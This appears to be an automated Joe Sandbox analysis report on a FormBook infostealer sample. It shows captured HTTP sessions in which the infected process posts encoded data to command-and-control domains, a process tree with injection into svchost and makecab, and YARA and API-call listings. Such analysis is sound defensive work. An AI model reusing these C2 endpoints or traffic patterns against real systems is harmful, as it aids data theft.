                                                                  Oct 8, 2024 14:19:56.641339064 CEST | 1236 | IN | Data Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                  Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                  Oct 8, 2024 14:19:56.641350031 CEST | 1236 | IN | Data Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                  Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                  Oct 8, 2024 14:19:56.641935110 CEST | 1000 | IN | Data Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                                  Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                                  Oct 8, 2024 14:19:56.641944885 CEST | 760 | IN | Data Raw: 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f
                                                                  Data Ascii: d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:


                                                                  Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 50020 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp: Oct 8, 2024 14:20:17.854618073 CEST | Bytes transferred: 727 | Direction: OUT
                                                                  Data: POST /oigd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.crowsecurity.cloud
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.crowsecurity.cloud
                                                                  Referer: http://www.crowsecurity.cloud/oigd/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Ascii: nrs8j=DkNDGit6RYrWczssNL5AgNY0FK/9Nm08pzkIO8duUKS3Poak/xj55vylNRNsUDSdFv5vu19WgGvFIuDh0Yo2ps1IJiX5S2c6MBdAhOR5A5aPCh8p6vq8sQae8T5gKqo89I/MkOHT5SVj0KQ0L2BXrHLyF3ucCuDfWxOQVHVG3JSsvtkjdw95RjyZUVy/poS54g==


                                                                  Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 50021 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp: Oct 8, 2024 14:20:20.592905045 CEST | Bytes transferred: 747 | Direction: OUT
                                                                  Data: POST /oigd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.crowsecurity.cloud
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.crowsecurity.cloud
                                                                  Referer: http://www.crowsecurity.cloud/oigd/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Ascii: nrs8j=DkNDGit6RYrWODcsOsVAxdY3Z6/9D20wpzoIO9ZAV/63MJqkt0X5+vylDxNTQDTRFv0Pu0tWgGrFIsLh1vExqc1KACX/Nmc6MBdAhO1TA5CPCxMp5L+7ygaZ7T5gcao49I/+kND15UZj0Lg0Ii1UxXK5anvOMrzaYTn9alNF+pW+nL15MBcuDjWqJS7LkrvwjqS9ExEyf+j1T7EPAmBAf9Y=


                                                                  Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 50022 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp: Oct 8, 2024 14:20:23.475444078 CEST | Bytes transferred: 10829 | Direction: OUT
                                                                  Data: POST /oigd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.crowsecurity.cloud
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.crowsecurity.cloud
                                                                  Referer: http://www.crowsecurity.cloud/oigd/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3


                                                                  Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 50023 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp: Oct 8, 2024 14:20:26.021681070 CEST | Bytes transferred: 447 | Direction: OUT
                                                                  Data: GET /oigd/?Yp=eXMH4fkp&nrs8j=OmljFUtRbeDOfRENDbVJh6NUYYaJHl1k9TsJZM5Ee42aF5vB50jMxPr4FwwBeRCvDsFug2RQoELqNPfysYsF+OkFJw//SD8mDkg+57R+QpypShxcm6mm+yI= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.crowsecurity.cloud
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Timestamp: Oct 8, 2024 14:20:26.592878103 CEST | Bytes transferred: 393 | Direction: IN
                                                                  Data: HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Tue, 08 Oct 2024 12:20:26 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 253
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yp=eXMH4fkp&nrs8j=OmljFUtRbeDOfRENDbVJh6NUYYaJHl1k9TsJZM5Ee42aF5vB50jMxPr4FwwBeRCvDsFug2RQoELqNPfysYsF+OkFJw//SD8mDkg+57R+QpypShxcm6mm+yI="}</script></head></html>


                                                                  Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 50024 | Destination IP: 3.33.130.190 | Destination Port: 80
                                                                  Timestamp: Oct 8, 2024 14:20:32.172312975 CEST | Bytes transferred: 730 | Direction: OUT
                                                                  Data: POST /tlbx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.myjiorooms.services
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.myjiorooms.services
                                                                  Referer: http://www.myjiorooms.services/tlbx/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Ascii: nrs8j=dWy08K6n3QVjvNcbIcCsuIAuPoeA6b/ZMbp4k4vpxdNr+escgbZInSSUbhLBLV555/3+Cb/9mkvj95ZwuNrwxWTE3ztim+v7ax54uU9HnvB0XDAGcJrWWnBorog5sRduCAKavtEaKv65Jt3/2ED5hl/coz2F34GtHIlmTScf+r0SyquRSNh1pnZ8i3z/AK45Sw==



                                                                  Target ID:0
                                                                  Start time:08:17:24
                                                                  Start date:08/10/2024
                                                                  Path:C:\Users\user\Desktop\8mmZ7Bkoj1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'366'295 bytes
                                                                  MD5 hash:CCE5D60668494A747CA41F5D8B17E76A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:08:17:30
                                                                  Start date:08/10/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
                                                                  Imagebase:0x190000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:08:17:59
                                                                  Start date:08/10/2024
                                                                  Path:C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe"
                                                                  Imagebase:0xbb0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:6
                                                                  Start time:08:18:01
                                                                  Start date:08/10/2024
                                                                  Path:C:\Windows\SysWOW64\makecab.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\makecab.exe"
                                                                  Imagebase:0x2c0000
                                                                  File size:68'096 bytes
                                                                  MD5 hash:00824484BE0BCE2A430D7F43CD9BABA5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:08:18:16
                                                                  Start date:08/10/2024
                                                                  Path:C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe"
                                                                  Imagebase:0xbb0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:08:18:28
                                                                  Start date:08/10/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6bf500000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:1.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:14.2%
                                                                    Total number of Nodes:134
                                                                    Total number of Limit Nodes:13

                                                                    Control-flow Graph

                                                                    control_flow_graph 133 24277c3-24277ec call 243f2d3 136 24277f2-2427800 call 243f8d3 133->136 137 24277ee-24277f1 133->137 140 2427802-242780d call 243fb73 136->140 141 2427810-2427821 call 243dc53 136->141 140->141 146 2427823-2427837 LdrLoadDll 141->146 147 242783a-242783d 141->147 146->147
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02427835
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 5ef096c8c7a1e93c2715944f6dd01e06b1f1e1557ddf92f29a19b760ffd8ce82
                                                                    • Instruction ID: 232fec595a86fca2a3673ab2a5d4ca5fc25ab67a665179f6df25ec1d63384a68
                                                                    • Opcode Fuzzy Hash: 5ef096c8c7a1e93c2715944f6dd01e06b1f1e1557ddf92f29a19b760ffd8ce82
                                                                    • Instruction Fuzzy Hash: 42011EB5D0020DABDB10DBE5DC41F9EB379AB54308F0081AAE90897280F671EB18CB91

                                                                    Control-flow Graph

                                                                    control_flow_graph 177 243c533-243c56f call 24147a3 call 243d763 NtClose
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0243C56A
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 1f6b16b50c1623c80d6a4ebea6231e5f0da945ed92dd2bcb1851470dc9f5c42f
                                                                    • Instruction ID: ab7248dcc21d524604f3f0df17e594db55529ad06689595a8fc0bb25015deed7
                                                                    • Opcode Fuzzy Hash: 1f6b16b50c1623c80d6a4ebea6231e5f0da945ed92dd2bcb1851470dc9f5c42f
                                                                    • Instruction Fuzzy Hash: 54E04F366006187BD120BA5ADD41F97776DDFC5714F004019FA18A7140C6B079048BE1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d7c6cf7c4ec166a72fcf2c08bf7379d9e2dc579b535546d6f8ee88d5c4f0d254
                                                                    • Instruction ID: 877f14bf23231755c36e84c240eca56d54d4acbab83e05316008c0440b77771c
                                                                    • Opcode Fuzzy Hash: d7c6cf7c4ec166a72fcf2c08bf7379d9e2dc579b535546d6f8ee88d5c4f0d254
                                                                    • Instruction Fuzzy Hash: 98900271242404034545B1584455617400B87E0301B95D061E5494594DC5358991A125
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8946b5e0ee591a2a6b1a6a3ad853fa554afafc4d7713660a3ea63f0546ee3827
                                                                    • Instruction ID: e7e10466e80d53eb126cf34871d1713f9ea514e3773547997ae8f232cdf02f1d
                                                                    • Opcode Fuzzy Hash: 8946b5e0ee591a2a6b1a6a3ad853fa554afafc4d7713660a3ea63f0546ee3827
                                                                    • Instruction Fuzzy Hash: 9E90023124140813D551B1584545707000A87D0341FD5D452A48A455CD96668A52E121
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3f5689d5568528678ff2772a83c4ae4a8c3050025cba5acf404892c604bd037a
                                                                    • Instruction ID: 0871efc07ce2b033aef9fdbc594b8c66fdaf44110e71d8f639ff775bee52563f
                                                                    • Opcode Fuzzy Hash: 3f5689d5568528678ff2772a83c4ae4a8c3050025cba5acf404892c604bd037a
                                                                    • Instruction Fuzzy Hash: EC90023164550802D540B1584555707100687D0301FA5D451A48A456CD87A58A51A5A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aacc94778e44a2c7bd02a21a044e5c3359a77f634a721a84d4dfdec1693611c3
                                                                    • Instruction ID: 4b64eabfb0fa4a6a2e13863f4b396f119538fe2bb7a5c2fbb354ec3dbbb5641e
                                                                    • Opcode Fuzzy Hash: aacc94778e44a2c7bd02a21a044e5c3359a77f634a721a84d4dfdec1693611c3
                                                                    • Instruction Fuzzy Hash: 98F1A271D0022AAFDB24CFA6CC84BAFB779AF44304F54819EE519A7241D7706A49CFA1

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(g6sPb5,00000111,00000000,00000000), ref: 024240AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: g6sPb5$g6sPb5
                                                                    • API String ID: 1836367815-4070624366
                                                                    • Opcode ID: bfa6c6c5b910c82b02fb46b5d848c27d68cd47ffac70c083faaa7ae8ce8155ef
                                                                    • Instruction ID: 22057f64bb5a4f7eeb1486d4ede9600aa13764d8e540010ad7997f2cf7119f32
                                                                    • Opcode Fuzzy Hash: bfa6c6c5b910c82b02fb46b5d848c27d68cd47ffac70c083faaa7ae8ce8155ef
                                                                    • Instruction Fuzzy Hash: 0601A571D0021C7AEB11A6E58C81EEFBB7CDF45798F448169FA14B7240D6645E068BE2

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(g6sPb5,00000111,00000000,00000000), ref: 024240AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: g6sPb5$g6sPb5
                                                                    • API String ID: 1836367815-4070624366
                                                                    • Opcode ID: 80500729ef6f262638a181bb610d6b5e47d5d4cc609269b6f3cbd2cf54943d2d
                                                                    • Instruction ID: 2e46f9ec8530796dcaadd3314c1c2ced07a188599a09674487e2d0dd739e261f
                                                                    • Opcode Fuzzy Hash: 80500729ef6f262638a181bb610d6b5e47d5d4cc609269b6f3cbd2cf54943d2d
                                                                    • Instruction Fuzzy Hash: FB01C472D0021C7AEB11A6E58C81EEFBB7CDF45698F448169FA14A7240D6745E0A8BE2

                                                                    Control-flow Graph

                                                                    control_flow_graph 118 2427843-2427867 120 2427869-2427877 118->120 121 242780c-2427813 118->121 124 2427884-2427912 120->124 125 2427879-242787e 120->125 122 2427819-2427821 121->122 123 2427814 call 243dc53 121->123 126 2427823-2427837 LdrLoadDll 122->126 127 242783a-242783d 122->127 123->122 129 2427914-242791a 124->129 130 242792f-2427933 124->130 125->124 126->127 131 242797b-242797e 129->131 132 242791c-2427921 129->132
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02427835
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 8f18771ff06d8c843c5382008cb27fdd5f1658f91d82d486f8d4e3dfc764fe64
                                                                    • Instruction ID: aea3e39e7e15afc0b9f490d4cd36831f95aa13ab037d8537c02b0abcfa4f84a3
                                                                    • Opcode Fuzzy Hash: 8f18771ff06d8c843c5382008cb27fdd5f1658f91d82d486f8d4e3dfc764fe64
                                                                    • Instruction Fuzzy Hash: 7C118972905129ABDB11CFAACCC1BA6F7A5EF05204F4041DAE84CCF205F634E51AC781

                                                                    Control-flow Graph

                                                                    control_flow_graph 148 24277b7-24277bb 149 242780b-242780d 148->149 150 24277bd-24277c0 148->150 153 2427810-2427821 call 243dc53 149->153 151 24277c2-24277c4 150->151 152 24277c5-24277df 150->152 151->152 155 24277e7-24277ec 152->155 156 24277e2 call 243f2d3 152->156 160 2427823-2427837 LdrLoadDll 153->160 161 242783a-242783d 153->161 158 24277f2-2427800 call 243f8d3 155->158 159 24277ee-24277f1 155->159 156->155 158->153 164 2427802-242780d call 243fb73 158->164 160->161 164->153
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02427835
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: ea8b0b66425c5859dcf35716314d0d01e2c84b2ecff666065d518572ac6f59f2
                                                                    • Instruction ID: d1e99b12a7d19cea8de467aa0e90e4bab2a222e64bf75191907f444590cb002b
                                                                    • Opcode Fuzzy Hash: ea8b0b66425c5859dcf35716314d0d01e2c84b2ecff666065d518572ac6f59f2
                                                                    • Instruction Fuzzy Hash: 2901AC75D4020DABDF00DA95D841FEDB7749B48204F008195D91CD7240F2719A09CB91

                                                                    Control-flow Graph

                                                                    control_flow_graph 167 243c843-243c884 call 24147a3 call 243d763 RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0242E58E,?,?,00000000,?,0242E58E,?,?,?), ref: 0243C87F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 16a4f3bf96a57099fc5474b8d2edb50e7aa9a884e77a5b8bb9cc59858096214f
                                                                    • Instruction ID: 9b6300a001f442de4a9690d3bf107b58cc94a15a9fbc57c4f8a56740c02790a8
                                                                    • Opcode Fuzzy Hash: 16a4f3bf96a57099fc5474b8d2edb50e7aa9a884e77a5b8bb9cc59858096214f
                                                                    • Instruction Fuzzy Hash: 33E06D76600604BFD610EE9AEC84E9B77ADEFC9710F004019F918A7240D671B9108BB5

                                                                    Control-flow Graph

                                                                    control_flow_graph 172 243c893-243c8d4 call 24147a3 call 243d763 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,7473EC45,00000007,00000000,00000004,00000000,0242704C,000000F4), ref: 0243C8CF
